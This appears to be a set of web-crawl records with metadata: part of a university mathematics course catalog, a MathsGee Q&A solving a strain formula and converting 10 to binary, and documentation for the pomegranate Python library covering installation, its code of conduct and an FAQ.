2311, PSCI 2312, PSYC 2330, QMTH 2330, and SOC 2321. The use of appropriate technology is emphasized. Lecture/Activity format. Prerequisite: MATH 1360 or MATH 1390 or equivalent. [ACTS: MATH2103]\n\n2330 DISCRETE STRUCTURES I This course provides a mathematical foundation for applications in computer science and for the development of more advanced mathematical concepts required for a major in computer science. Topics include Boolean operations, truth tables, set operations, mathematical induction, relations, functions, analysis of algorithms, and recursive algorithms. This course uses lecture and problem-solving activities. Prerequisite: Grade of C or higher in CSCI 1470 and either MATH 1491 or MATH 1496, or consent of instructor.\n\n2335 TRANSITION TO ADVANCED MATHEMATICS This course is an introduction to the language and methods of advanced mathematics. The student will learn the basic concepts of formal logic and its use in proving mathematical propositions. Specific topics that will be covered may vary depending upon the instructor, but will include basic number theory and set theory. Prerequisite: MATH 1497.\n\n2441 INTRODUCTION TO MATHEMATICAL COMPUTATION This course focuses on the process of translating a mathematical concept, formula or algorithm into a form that is appropriate for investigation via computational tools, including common mathematical software and programming languages. The basic concepts of programming and their implementations (such as data types, arrays, conditional statements, loops, functions) will be discussed. Topics may include applications of summations, iterative methods, recursion, polynomial approximations, numerical approximations, and applications from other fields of science. Lecture/Computer Lab format. Prerequisite: MATH 1497 or concurrent enrollment in MATH 1497.\n\n2471 CALCULUS III This course is a continuation of Calculus II and is required of all majors in mathematics, chemistry, and physics. Topics include vector valued functions, partial differentiation, multiple integrals, Green’s theorem, and Stokes’ theorem. Lecture format. Prerequisite: C or better in MATH 1497. [ACTS: MATH2603]\n\n3V25 SPECIAL TOPICS IN MATHEMATICS (Variable credit: 1-3 credit hours.) This course is an elective lecture course that focuses on advanced topics in mathematics not covered in the current curriculum. Topics vary with instructors. Course may be repeated. Prerequisite: MATH 1497 and consent of instructor.\n\n3311 STATISTICAL METHODS  This course emphasizes statistical data analysis including descriptive statistics, discrete and continuous random variables, probability distributions, sampling distributions, estimation, hypothesis testing, and simple linear regression. Statistical computer software will be used. Prerequisites: MATH 2441, or MATH 1496 and CSCI 1470, or consent of instructor.\n\n3320 LINEAR ALGEBRA This course is required for all majors in mathematics, physics, and computer science. This course introduces matrix algebra, vector spaces, linear transformations, and Eigenvalues. Optional topics include inner product spaces, solutions to systems of differential equations, and least squares. Lecture format. Prerequisite: C or better in MATH 1497 or C or better in CSCI 2330. [UD UCA Core: I]\n\n3330 COMBINATORICS AND GRAPH THEORY  This course covers two advanced topics in discrete mathematics. Graph theory topics may include connectivity, traversability, matchings, and coloring. Combinatorics topics may include permutations, combinations, recurrence relations, and generating functions. Prerequisite: C or better in either MATH 2330 or MATH 2335.\n\n3331 ORDINARY DIFFERENTIAL EQUATIONS I  Topics include linear and nonlinear first order equations, linear, second, or higher order equations, the Cauchy-Euler equation, and systems of linear first order equations. Applications from the natural sciences and engineering are emphasized. Lecture/computer activities. Prerequisite: MATH 1497. [UD UCA Core: C]\n\n3351 NUMBER SYSTEMS: INTEGERS This course is a professional development course required for elementary education majors. The course organizes mathematical knowledge of whole number concepts and operations, number theory, and data analysis so that teacher candidates connect concepts to mathematical processes, learn models for mathematical ideas, and explore the mathematics from the perspective of a student and a teacher. The primary method of delivery is through activities involving manipulatives and problem solving. MATH 3351 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: C or better in MATH 1360 or MATH 1390 or higher, and intent to apply for admission to Teacher Education.\n\n3352 NUMBER SYSTEMS: REALS This course is a professional development course required for elementary and middle-level education majors. The course is to organizes mathematical knowledge of fractions and decimals, operations with fractions and decimals, and proportions so that teacher candidates connect concepts, learn models for mathematical ideas, and explore the mathematics from the perspective of a student and a teacher. The primary methods of delivery will be investigation (including use of models), problem solving, and discussion. MATH 3352 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: MATH 3351 and declared major in teacher education. This course is not open to non-education majors.\n\n3354 CONCEPTS OF DISCRETE MATHEMATICS This course, a requirement for middle-level mathematics teacher candidates and an option for secondary teacher candidates, is the study of modeling and solving problems involving sequential change and decision-making in finite settings. Topics include graph theory, number theory, recursion, counting methods, optimization, probability, combinations, and algorithmic problem solving. The primary methods of delivery are discussion and activities. MATH 3354 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: MATH 1390 or a content course above 1390.\n\n3360 INTRODUCTION TO RINGS AND FIELDS This course is designed to introduce students to abstract mathematics. Topics include binary operations, the integers, modular number systems, rings, and fields. Prerequisite: MATH 2335 or consent of instructor.\n\n3362 INTRODUCTION TO GROUP THEORY This course is designed to introduce students to abstract mathematics. Topics include groups, subgroups, group homomorphism, and the classification of finite abelian groups. Additional topics vary but may include Lie groups, representation theory, group actions, or Galois groups depending on the makeup of the class. Prerequisite: MATH 3320 or consent of instructor.\n\n3364 CONCEPTS OF GEOMETRY AND MEASUREMENT This course is a requirement for middle-level mathematics teacher candidates. The course will use both hands-on and computer activities such as concrete geometric models, virtual manipulatives, and other dynamic geometry tools. Geometric reasoning and constructions will be emphasized using introductory proofs and computer explorations. This course will also connect geometry and measurement to other topics such as probability and algebra using geometric models and coordinate geometry. Delivery will include discussions, computer labs, and problem solving activities. MATH 3364 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: MATH 1390 (College Algebra) and MATH 3351 (Number Systems).\n\n3370 MATHEMATICS IN THE SECONDARY SCHOOLS This course is required for all mathematics majors with a STEMteach minor. The main goal is to review the mathematics curriculum currently taught in secondary schools and the corresponding curricular materials and instructional strategies with an emphasis on content knowledge for teaching. Class discussions, presentations, task analysis, and state and national standards are central to the course. MATH 3370 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: MATH 1496.\n\n3381 DATA CLEANING AND VISUALIZATION This course provides an intensive, hands-on introduction to Data Cleaning with a statistical programming language. Students will learn the fundamental skills required to import, tidy, transform, manipulate, visualize, and communicate data using statistical programming software. Prerequisite: MATH 3311 or consent of the instructor.\n\n3391 NONPARAMETRIC STATISTICS This course focuses on nonparametric procedures with desirable properties that hold under relatively weaker assumptions. Topics include Binomial test, sign tests, Wilcoxon Signed Rank Test, Permutation test, Wilcoxon Rank-Sum Test, Mann-Whitney Test, Siegel-Tukey Test, Kolmogorov-Smirnov Test, Kruskal-Wallis Test, Friedman’s Test, Cochran’s Q Test, Kendall’s W test, Spearman Rank Correlation, Bootstrap Methods, Smoothing methods, and Robust Model fitting. Prerequisite: MATH 3311 or consent of the instructor.\n\n3392 MULTIVARIATE ANALYSIS This course is an introduction to multivariate analysis in data science and shows how multivariate statistical techniques can be applied to analyze datasets with many variables. Topics may include data visualization, principal components analysis, multidimensional scaling, exploratory and confirmatory factor analyses, structural equation models, and analysis of repeated measures data. Prerequisites: MATH 3311 and 3320, or consent of the instructor.\n\n4V25 UNDERGRADUATE RESEARCH IN MATHEMATICS (Variable credit: 1-3 credit hours.) The student will engage in mathematical research under the supervision of a faculty mentor. Course may be repeated. Prerequisites: MATH 2471 and consent of instructor.\n\n4200 INTRODUCTION TO EDUCATIONAL TESTING AND ASSESSMENT IN MATHEMATICS This course is required for majors and minors in mathematics education who plan to seek teacher licensure. The course is designed to study the purpose, analysis, and construction of various assessments and the assessment policies and issues that impact teaching. Class discussions, projects, and presentations are central to the course. Prerequisites: MATH 3370 and Admission to Teacher Education. Corequisite: MATH 4301.\n\n4301 SECONDARY MATHEMATICS METHODS  This course is required for STEMteach mathematics education majors. Topics include innovative curricula for secondary mathematics topics, state and national standards, planning and organization in the classroom, strategies, methods, materials, technology, and other topics related to teaching and learning mathematics. Class discussions, presentations, and papers such as summaries and critiques are central to the course. Prerequisite: Admission to Secondary Teacher Education. [UD UCA Core: C]\n\n4305 ORDINARY DIFFERENTIAL EQUATIONS II This course is an elective course for majors in mathematics and applied mathematics. The topics include ordinary and partial differential equations, Fourier series, and numerical analysis with modeling applications in physics, biology, and other sciences. Lectures, computer labs, and projects are central to the course. Prerequisite: MATH 3320 and 3331.\n\n4306 MODELING AND SIMULATION  This project-oriented capstone course applies techniques and methods in mathematics (such as differential equations, probability, statistics) to solve realistic problems from science, business, and industry. Lectures, computer labs, and projects. Prerequisites: MATH 2441 and 3331; and pre-/corequisites: MATH 3320 and 4371. [UD UCA Core: Z]\n\n4310 GEOMETRY AND MEASUREMENT TOPICS FOR ELEMENTARY TEACHERS This course is a professional development course required for elementary education majors. Mathematical topics may include geometry, probability, statistics, measurement, state and national standards, and technology. Class discussions, presentations, article critiques, discovery and cooperative learning are central to the course. MATH 4310 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: C or better in MATH 3351 or equivalent.\n\n4312 THE METRIC SYSTEM AND OTHER TOPICS FOR ELEMENTARY AND MIDDLE SCHOOL TEACHERS This course is a professional development course for elementary and middle school preservice teachers. Topics include converting in the metric system, measurement, geometry, and number systems. This activity-oriented course includes numerous hands-on materials for measuring and converting, presentations, article critiques, NCTM standards, and cooperative learning. MATH 4312 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: C or better in MATH 3351 or equivalent.\n\n4313 FUNCTIONS AND MODELING This course includes explorations and lab activities designed to strengthen and expand students’ knowledge of secondary education mathematics topics. Students collect data and explore a variety of situations that can be modeled using linear, exponential, polynomial, and trigonometric functions. Activities are designed to engage students in a deeper look at topics to which they have been previously exposed, to illuminate the connections between secondary and college mathematics, to illustrate good uses of technology in teaching, to illuminate the connections between various areas of mathematics , and to engage in serious, non-routine problem solving, problem-based learning, and applications of mathematics. This course is required for mathematics majors who are completing the STEM education minor. Prerequisite: MATH 1497.\n\n4314 APPLICATIONS OF MIDDLE LEVEL MATHEMATICS This course is required for the middle level mathematics/science education majors. The primary goal is to provide preservice teachers with the opportunity to learn mathematics and science as integrated content and pedagogy. Candidates enroll in this course concurrent with the middle level Teaching Internship I. The primary method of delivery is through activities, problem solving, projects, and presentations. MATH 4314 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisite: MATH 3351 and SCI 3320 and admission to Middle Level Teacher Education. Required corequisite: MSIT 4411.\n\n4315 INTRODUCTION TO PARTIAL DIFFERENTIAL EQUATIONS  Topics in this course include solving first order linear, non-linear partial differential equations using the method of characteristics, and solving second order linear partial differential equations using separation of variables. Applications include heat conduction, steady state temperatures, and vibrating strings and membranes. Lecture. Prerequisites: MATH 2471 and 3331.\n\n4316 FUNDAMENTALS OF APPLIED MATHEMATICS FOR FLUID MECHANICS AND GRANULAR MATERIALS This course is an introduction to applied mathematics in fluid mechanics and granular materials. It is an elective for all mathematics majors. Topics include dimensional analysis, perturbation methods for algebraic equations and differential equations, basic concepts and methods for fluid mechanics as well as granular materials. Prerequisite: MATH 4315.\n\n4320 CONCEPTS OF CALCULUS This course is required for middle level teacher candidates in the mathematics/science track. The primary goal is to connect middle school mathematics content with advanced mathematics. Topics include the concepts of derivative, integral, Pick’s Theorem, Monte Carlo method, rates of change, and partitioning methods. In addition to the mathematics content, the course focuses on instructional methods, strategies, and connections to science topics. Delivery is mainly through discussion and problem solving activities. Prerequisite: MATH 3354 or MATH 3364.\n\n4330 MATHEMATICAL MODELING IN BIOLOGY This elective course is an introduction to mathematical modeling and analysis in biology and life sciences. Topics include dynamic system theory, feedback control, enzyme kinetics, Michaelis-Menten equation, the Hodgkin-Huxley model, mathematical models for calcium dynamics and blood glucose regulation, numerical solutions and mathematical analysis of the models. A contemporary textbook, research papers on this subject, and MATLAB will be used. Primary methods of delivery are lecture, student presentations, and discussion. Prerequisite: C or better in MATH 2441 and 3331.\n\n4335 CONCEPTS OF ADVANCED MATHEMATICS This course is required in the middle level mathematics/science degree and is designed to demonstrate the connections among all the strands in the middle school curriculum and to develop the algebra and number strands through standards-based materials. The course emphasizes the middle level transition from arithmetic to algebraic thinking and formal reasoning. Standards-based activities and assessments, critiques, and curriculum analysis are central to the course. MATH 4335 does not fulfill a Mathematics major, minor, or Bachelor of Science special degree requirement. Prerequisites: MATH 3354 or MATH 3364 and admission to Middle Level Teacher Education.\n\n4340 NUMERICAL METHODS This course is a mathematics elective that introduces methods of numerical analysis with modern high speed computers. Topics include methods of solving nonlinear equations, linear and nonlinear systems, polynomial approximation, curve fitting, numerical differential equations, numerical optimization. Lecture and computer activities. Prerequisite: MATH 2441 and 3320, both with a grade of C or better.\n\n4345 COLLEGE GEOMETRY This course is required for all mathematics majors with a STEMteach minor. The course focuses on the elementary theory in foundations of geometry, advanced Euclidean geometry, and introduces transformations and non-Euclidean geometries. Problem solving, discovery, computer activities, and lecture. Prerequisite: MATH 1496.\n\n4350 INTRODUCTION TO THE HISTORY OF MATHEMATICS  This course is required for all mathematics majors with a STEMteach minor. The course traces the historical development of topics encountered in the secondary mathematics curriculum from the rise of civilization through the eighteenth century. Explorations of historical problems are emphasized. The purpose of the course is to provide an understanding of the evolution of mathematical concepts and the contributions of diverse cultures. Lecture, research, and discussion. Prerequisite: MATH 1497. [UD UCA Core: D]\n\n4360 TEACHING INTERNSHIP I This internship is required of secondary mathematics education majors. In the form of a one 8-hour day per week practicum, this course combines the study of discipline-specific teaching methods and materials with the study of secondary school curriculum. Candidates enroll in this internship concurrent with courses in methods, assessment, literacy, and the history of mathematics. Prerequisite: MATH 3370 and admission to Secondary Teacher Education. Required corequisites: MATH 4301, 4350, MSIT 4320 and 4325.\n\n4362 ADVANCED CALCULUS I This rigorous theoretical treatment of calculus includes completeness, compactness, connectedness, sequences, continuity, differentiation, integration, and series. Prerequisites: MATH 2471 and MATH 2335 or consent of instructor. [UD UCA Core: Z]\n\n4363 ADVANCED CALCULUS II  This course is a multivariable treatment of Advanced Calculus topics that include a rigorous study of partial differentiation, multiple integrals, Implicit Function Theorem, Fubini’s Theorem, line integrals, and surface integrals. Prerequisite: MATH 4362 or consent of instructor.\n\n4371 INTRODUCTION TO PROBABILITY This course presents a calculus-based probability theory. Topics include axioms of probability, probability rules, conditional probability and Bayes theorem, discrete/continuous random variables with their distribution functions, expected values and variances, joint distribution, conditional distribution, covariance and conditional expectation. Prerequisite: MATH 1497. [UD UCA Core: R]\n\n4372 INTRODUCTION TO STATISTICAL INFERENCEThis course is an introduction to the core theory of statistical inference. Topics include review of probability/distribution theory, sampling distributions, limiting distributions and modes of convergence, methods of estimation such as MME, MLE, and UMVUE with their properties. Prerequisite: MATH 4371.\n\n4373 REGRESSION ANALYSIS This course is an introduction to both the theory and practice of regression analysis. Topics include simple and multiple linear regression, linear models with qualitative variables, inferences about model parameters, regression diagnostics, variable selection, and the regression approach to analysis of variance (ANOVA). Prerequisite: MATH 3311 with a grade of C or higher, or consent of the instructor.\n\n4374 INTRODUCTION TO STOCHASTIC PROCESSESThis course is an introduction to applied mathematics in stochastic processes, computer science, management science, the physical and social sciences, and operations research. Topics include review of probability, Markov chains, continuous-time Markov chains, and stationary processes. Prerequisite: MATH 4371 or consent of instructor.\n\n4375 INTRODUCTION TO TOPOLOGY   This course starts by asking, “What are the most general conditions that guarantee a function has a maximum value?” This requires generalizing the definition of “continuous” and leads to the definitions of a “topology” and of “compact.” This generalization process is then reversed, yielding a metrization theorem. Further topics may include brief introductions to differential manifolds, homology, and non-commutative geometry. Prerequisite: MATH 2471 or consent of instructor.\n\n4380 SPECIAL PROBLEMS IN MATHEMATICS This course is an independent study or research project in a selected area of advanced mathematics. Prerequisite: Consent of instructor.\n\n4381 SPECIAL PROBLEMS IN MATHEMATICS This course is an independent study or research project in a selected area of advanced mathematics. Prerequisite: Consent of instructor.\n\n4385 COMPLEX ANALYSIS  The content of this course includes the arithmetic and geometry of the complex numbers, extension of transcendental functions to the field of complex numbers, analytic function theory, contour integration, and the Cauchy Integral Theorem, series, calculus of residues, and harmonic functions. This course is fundamental to physics and engineering as well as an extensive source of problems in pure mathematics. Prerequisite: MATH 2471 or consent of instructor.\n\n4391 MACHINE LEARNING  This course is an introduction to common methods and algorithms used in machine learning. Content is broken down into supervised and unsupervised learning with an emphasis on using current cross-validation methods in either setting. Supervised topics include a variety of linear regression methods, classification and regression trees, and support vector machines. Unsupervised methods include cluster analysis and principal components. Students learn not only the theoretical underpinnings of learning, but also gain the practical know-how needed to quickly and powerfully apply these techniques to new problems using statistical software. Prerequisite: MATH 4373 or consent of the instructor.\n\n4392 TIME SERIES AND FORECASTING This course is an introduction to time series analysis and forecasting in data science. Time series data are analyzed to understand the past and to predict the future. Topics include autocorrelation analysis, filtering time-series data, basic stochastic models, univariate time-series models, stationary models, non-stationary models, and long-memory processes. Prerequisite: MATH 4373 or consent of the instructor.\n\n4395 PRACTICUM IN DATA SCIENCE The practicum serves as the capstone course for the Data Science track within the BS degree. Each student will be assigned a project under the supervision of a departmental faculty member. The products of the practicum will be a detailed, technical paper that details databases, methods of analyses, findings, and an oral presentation that summarizes the paper. Each student’s work should demonstrate a synthesis of the skills taught in the various classes within the data science curriculum. Prerequisite: MATH 4391.[UD UCA Core: Z]\n\n4680, 4681 TEACHING INTERNSHIP II This course is designed for secondary pre-service teachers. The primary goal is to provide teaching experience under supervision in a school setting. Full-day involvement at a school site and in seminars is required. Prerequisites: Admission to the Internship and completion of all professional education courses. Student is required to enroll in MATH 4680 and 4681 simultaneously. [UD UCA Core: Z]" ]
[ null, "https://www.facebook.com/tr", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8751081,"math_prob":0.7876581,"size":29050,"snap":"2021-43-2021-49","text_gpt3_token_len":5824,"char_repetition_ratio":0.1757557,"word_repetition_ratio":0.12925677,"special_character_ratio":0.19277108,"punctuation_ratio":0.14491844,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.973355,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-23T22:52:07Z\",\"WARC-Record-ID\":\"<urn:uuid:16865922-66ea-4055-9a5b-324b7fc23c0e>\",\"Content-Length\":\"48713\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e9580b40-17a1-45af-89ee-9d6c154675e1>\",\"WARC-Concurrent-To\":\"<urn:uuid:5f70bb16-53e5-4ba8-b698-0e71415c5ce2>\",\"WARC-IP-Address\":\"161.31.3.35\",\"WARC-Target-URI\":\"https://uca.edu/ubulletin/courses/math/\",\"WARC-Payload-Digest\":\"sha1:U47QSIYO3VHGUCMFAI2EGK7VLUUJNCFI\",\"WARC-Block-Digest\":\"sha1:LPFLC5JJSANKGOMWSYJJL2HBLSLV3I2Q\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585828.15_warc_CC-MAIN-20211023224247-20211024014247-00505.warc.gz\"}"}
https://mathsgee.com/11904/diagrams-represent-metalrod-leangth-stretched-elongated
[ "Institutions: Global | Authors |Cars | Courseware |Ekurhuleni Libraries | Joburg Libraries | Startups | Tools |Tshwane Libraries | Math Worksheets | Visual Statistics\n\nMathsGee is Zero-Rated (You do not need data to access) on: Telkom |Dimension Data | Rain | MWEB\n\n0 like 0 dislike\n20 views\n\nThe two diagrams below represent a metalrod with an initial leangth $L_{1}$ which is then stretched (elongated) to a length $L_{2}$", null, "The strain measure $(\\epsilon)$ is defined as a ratio of elongation with respect to the original length and is given by the formula:\n\n$$\\epsilon = \\dfrac{L_{2}-L_{1}}{L_{1}}$$\n\n1. Express $L_{1}$ as the subject of the formula.\n2. Hence, or otherwise, calculate the value of $L_{1}$ if $\\epsilon=0.8$ and $L_{2}=18$ cm\n3. Convert the value obtained in 2 to a binary number.\n| 20 views\n\n## 1 Answer\n\n0 like 0 dislike\n1. eL1 = L2 - L1\n\neL1 + L1 = L2\n\nL1(e + 1) = L2\n\nL1 = L2/(e + 1)\n\n2. L1 = 18/(0.8 + 1)\n\n= 10 cm\n\n3. 10 = 8 + 2 = 2^3 + 2\n\n= 1010\nby Diamond (42,434 points)\n\n0 like 0 dislike\n0 answers\n1 like 0 dislike\n0 answers\n0 like 0 dislike\n0 answers\n0 like 0 dislike\n1 answer\n0 like 0 dislike\n1 answer" ]
[ null, "https://mathsgee.com/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8388297,"math_prob":0.99944764,"size":500,"snap":"2021-04-2021-17","text_gpt3_token_len":148,"char_repetition_ratio":0.11895161,"word_repetition_ratio":0.0,"special_character_ratio":0.322,"punctuation_ratio":0.06185567,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99943423,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-17T02:40:35Z\",\"WARC-Record-ID\":\"<urn:uuid:2e720437-1d88-49ac-b600-7b854bc82dad>\",\"Content-Length\":\"85160\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8a30f5fd-2ecf-492b-bffb-803860203882>\",\"WARC-Concurrent-To\":\"<urn:uuid:aa1fcf9e-62e0-4089-aa61-20a92d17ed79>\",\"WARC-IP-Address\":\"35.214.82.169\",\"WARC-Target-URI\":\"https://mathsgee.com/11904/diagrams-represent-metalrod-leangth-stretched-elongated\",\"WARC-Payload-Digest\":\"sha1:MH4FEOXICWEQU4B6LI6LGR6E7AVN6N6F\",\"WARC-Block-Digest\":\"sha1:HBUHCJLCT5RMSXB4VDXDWPQ6Y5AGMPEL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618038098638.52_warc_CC-MAIN-20210417011815-20210417041815-00021.warc.gz\"}"}
https://readthedocs.org/projects/pomegranate/downloads/htmlzip/latest/
[ "", null, "", null, "", null, "", null, "# Home¶\n\npomegranate is a Python package that implements fast and flexible probabilistic models ranging from individual probability distributions to compositional models such as Bayesian networks and hidden Markov models. The core philosophy behind pomegranate is that all probabilistic models can be viewed as a probability distribution in that they all yield probability estimates for samples and can be updated given samples and their associated weights. The primary consequence of this view is that the components that are implemented in pomegranate can be stacked more flexibly than other packages. For example, one can build a Gaussian mixture model just as easily as building an exponential or log normal mixture model. But that’s not all! One can create a Bayes classifier that uses different types of distributions on each features, perhaps modeling time-associated features using an exponential distribution and counts using a Poisson distribution. Lastly, since these compositional models themselves can be viewed as probability distributions, one can build a mixture of Bayesian networks or a hidden Markov model Bayes’ classifier that makes predictions over sequences.\n\nIn addition to a variety of probability distributions and models, pomegranate has a variety of built-in features that are implemented for all of the models. These include different training strategies such as semi-supervised learning, learning with missing values, and mini-batch learning. It also includes support for massive data supports with out-of-core learning, multi-threaded parallelism, and GPU support.\n\n# Thank You¶\n\nNo good project is done alone, and so I’d like to thank all the previous contributors to YAHMM, all the current contributors to pomegranate, and the many graduate students whom I have pestered with ideas and questions.\n\n# Contributions¶\n\nContributions are eagerly accepted! If you would like to contribute a feature then fork the master branch and be sure to run the tests before changing any code. Let us know what you want to do on the issue tracker just in case we’re already working on an implementation of something similar. Also, please don’t forget to add tests for any new functions. Please review the Code of Conduct before contributing.\n\n## Installation¶\n\nThe easiest way to get pomegranate is through pip using the command\n\npip install pomegranate\n\n\nThis should install all the dependencies in addition to the package.\n\nYou can also get pomegranate through conda using the command\n\nconda install pomegranate\n\n\nThis version may not be as up to date as the pip version though.\n\nLastly, you can get the bleeding edge from GitHub using the following commands:\n\ngit clone https://github.com/jmschrei/pomegranate\ncd pomegranate\npython setup.py install\n\n\nOn Windows machines you may need to download a C++ compiler if you wish to build from source yourself. For Python 2 this minimal version of Visual Studio 2008 works well. For Python 3 this version of the Visual Studio build tools has been reported to work.\n\nThe requirements for pomegranate can be found in the requirements.txt file in the repository, and include numpy, scipy, networkx (v2.0 and above), joblib, cupy (if using a GPU), and cython (if building from source or on an Ubuntu machine).\n\n### FAQ¶\n\n1. I’m on a Windows machine and I’m still encountering problems. What should I do?\n1. If those do not work, it has been suggested that https://wiki.python.org/moin/WindowsCompilers may provide more information. Note that your compiler version must fit your python version. Run python –version to tell which python version you use. Don’t forget to select the appropriate Windows version API you’d like to use. If you get an error message “ValueError: Unknown MS Compiler version 1900” remove your Python’s Lib/distutils/distutil.cfg and retry. See http://stackoverflow.com/questions/34135280/valueerror-unknown-ms-compiler-version-1900 for details.\n1. I’ve been getting the following error: ModuleNotFoundError: No module named 'pomegranate.utils'.\n1. A reported solution is to uninstall and reinstall without cached files using the following:\npip uninstall pomegranate\npip install pomegranate --no-cache-dir\n\n\nIf that doesn’t work for you, you may need to downgrade your version of numpy to 1.11.3 and try the above again.\n\n1. I’ve been getting the following error: MarkovChain.so: unknown file type, first eight bytes: 0x7F 0x45 0x4C 0x46 0x02 0x01 0x01 0x00.\n1. This can be fixed by removing the .so files from the pomegranate installation or by building pomegranate from source.\n1. I’m encountering some other error when I try to install pomegranate.\n1. pomegranate has had some weird linker issues, particularly when users try to upgrade from an older version. In the following order, try:\n1. Uninstalling pomegranate using pip and reinstalling it with the option –no-cache-dir, like in the above question.\n2. Removing all pomegranate files on your computer manually, including egg and cache files that cython may have left in your site-packages folder\n3. Reinstalling the Anaconda distribution (usually only necessary in issues where libgfortran is not linking properly)\n\n## Code of Conduct¶\n\n### Our Pledge¶\n\nIn the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.\n\n### Our Standards¶\n\nExamples of behavior that contributes to creating a positive environment include:\n\n• Using welcoming and inclusive language\n• Being respectful of differing viewpoints and experiences\n• Gracefully accepting constructive criticism\n• Focusing on what is best for the community\n• Showing empathy towards other community members\n\nExamples of unacceptable behavior by participants include:\n\n• The use of sexualized language or imagery and unwelcome sexual attention or advances\n• Trolling, insulting/derogatory comments, and personal or political attacks\n• Public or private harassment\n• Publishing others’ private information, such as a physical or electronic address, without explicit permission\n• Other conduct which could reasonably be considered inappropriate in a professional setting\n\n### Our Responsibilities¶\n\nProject maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.\n\nProject maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.\n\n### Scope¶\n\nThis Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.\n\n### Enforcement¶\n\nInstances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at [email protected]. Because the project team currently consists of only one member, that member shall investigate within one week whether a violation of the code of conduct occured and what the appropriate response is. That member shall then contact the original reporter and any other affected parties to explain the response and note feedback for the record. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Should you wish to file a report anonymously you should fill out a report at https://goo.gl/forms/aQtlDdrhZf4Y8flk2. If your report involves any members of the project team, if you feel uncomfortable making a report to the project team for any reason, or you feel that the issue has not been adequately handled, you are encouraged to send your report to [email protected] where it will be independently reviewed by the NumFOCUS team.\n\nProject maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project’s leadership.\n\nThis Code of Conduct is adapted from the Contributor Covenant homepage, version 1.4.\n\n## FAQ¶\n\nCan I create a usable model if I already know the parameters I want, but don’t have data to fit to?\n\nYes! pomegranate has two ways of initializing models, either by starting off with pre-initialized distributions or by using the Model.from_samples class method. In the case where you have a model that you’d like to use you can create the model manually and use it to make predictions without the need to fit it to data.\n\nHow do I create a model directly from data?\n\npomegranate attempts to closely follow the scikit-learn API. However, a major area in which it diverges is in the initialization of models directly from data. Typically in scikit-learn one would create an estimator and then call the fit function on the training data. In pomegranate one would use the Model.from_samples class method, such as BayesianNetwork.from_samples(X), to learn a model directly from data.\n\nMy data set has missing values. Can I use pomegranate?\n\nYes! pomegranate v0.9.0 merged missing value support. This means that you can learn models and run inference on data sets that have missing values just as easily as if they were fully observed. Indicate that a value is missing using either numpy.nan for numeric data sets or ‘nan’ in string data sets.\n\nWhat is the difference between fit and from_samples?\n\nThe fit method trains an initialized model, whereas the from_samples class method will first initialize the model and then train it. These are separated out because frequently a person already knows a good initialization, such as the structure of the Bayesian network but maybe not the parameters, and wants to fine-tune that initialization instead of learning everything directly from data. This also simplifies the backend by allowing the fit function to assume that the model is initialized instead of having to check to see if it is initialized, and if not then initialize it. This is particularly useful in structured models such as Bayesian networks or hidden Markov models where the Model.from_samples task is really structure learning + parameter learning, because it allows the fit function to be solely parameter learning.\n\nHow can I use pomegranate for semi-supervised learning?\n\nWhen using one of the supervised models (such as naive Bayes or Bayes classifiers) simply pass in the label -1 for samples that you do not have a label for.\n\nHow can I use out-of-core learning in pomegranate?\n\nOnce a model has been initialized the summarize method can be used on arbitrarily sized chunks of the data to reduce them into their sufficient statistics. These sufficient statistics are additive, meaning that if they are calculated for all chunks of a dataset and then added together they can yield exact updates. Once all chunks have been summarized then from_summaries is called to update the parameters of the model based on these added sufficient statistics. Out-of-core computing is supported by allowing the user to load up chunks of data from memory, summarize it, discard it, and move on to the next chunk.\n\nDoes pomegranate support parallelization?\n\nYes! pomegranate supports parallelized model fitting and model predictions, both in a data-parallel manner. Since the backend is written in cython the global interpreter lock (GIL) can be released and multi-threaded training can be supported via joblib. This means that parallelization is utilized time isn’t spent piping data from one process to another nor are multiple copies of the model made.\n\nDoes pomegranate support GPUs?\n\nCurrently pomegranate does not support GPUs.\n\nDoes pomegranate support distributed computing?\n\nCurrently pomegranate is not set up for a distributed environment, though the pieces are currently there to make this possible.\n\nHow can I cite pomegranate?\n\nThe research paper that presents pomegranate 